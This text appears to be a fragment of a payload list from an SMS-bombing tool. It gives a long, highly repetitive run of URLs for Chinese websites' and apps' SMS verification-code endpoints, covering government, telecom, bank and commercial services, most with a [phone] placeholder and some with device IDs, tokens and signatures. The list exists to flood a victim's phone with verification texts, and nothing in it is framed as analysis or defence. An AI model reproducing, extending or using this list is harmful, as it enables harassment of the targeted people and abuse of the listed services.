"http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://yunrg3866.xahost.yunrg.com/api.php?act=user&key=hz&phone=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.chaojidaogou.com/MsgHandler.ashx?t=sendcode&phone=[phone]", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", - "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", - "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", - "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]&platform=2&realVer=3.2.2&region=zh-CN&time_zone=28800&type=0&unlogin_token=724767db76a9c95e817d0101be771480&version_code=138", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", - "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584431770018", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]&smsType=2", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://e.weisns.com.cn/Jsonp/send_mobile_code_reg?callback=jQuery17208124790173017422_1582106551645&mobile=[phone]&token=00-cef055211be84b54a91287fc906bb0d90401bficbagfjjnore2etrosopaqp2rwsslaglw-09fe1fe580b4879abdbabd7ca1f5e26c-5dee0acfe62d2b442088c156&_=1582106605205", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.csti.cn/uums-user-front/api/user/register/phone/send?phone=[phone]", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]=a70ca68498d9489dbe88e141ba49751267896313", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - 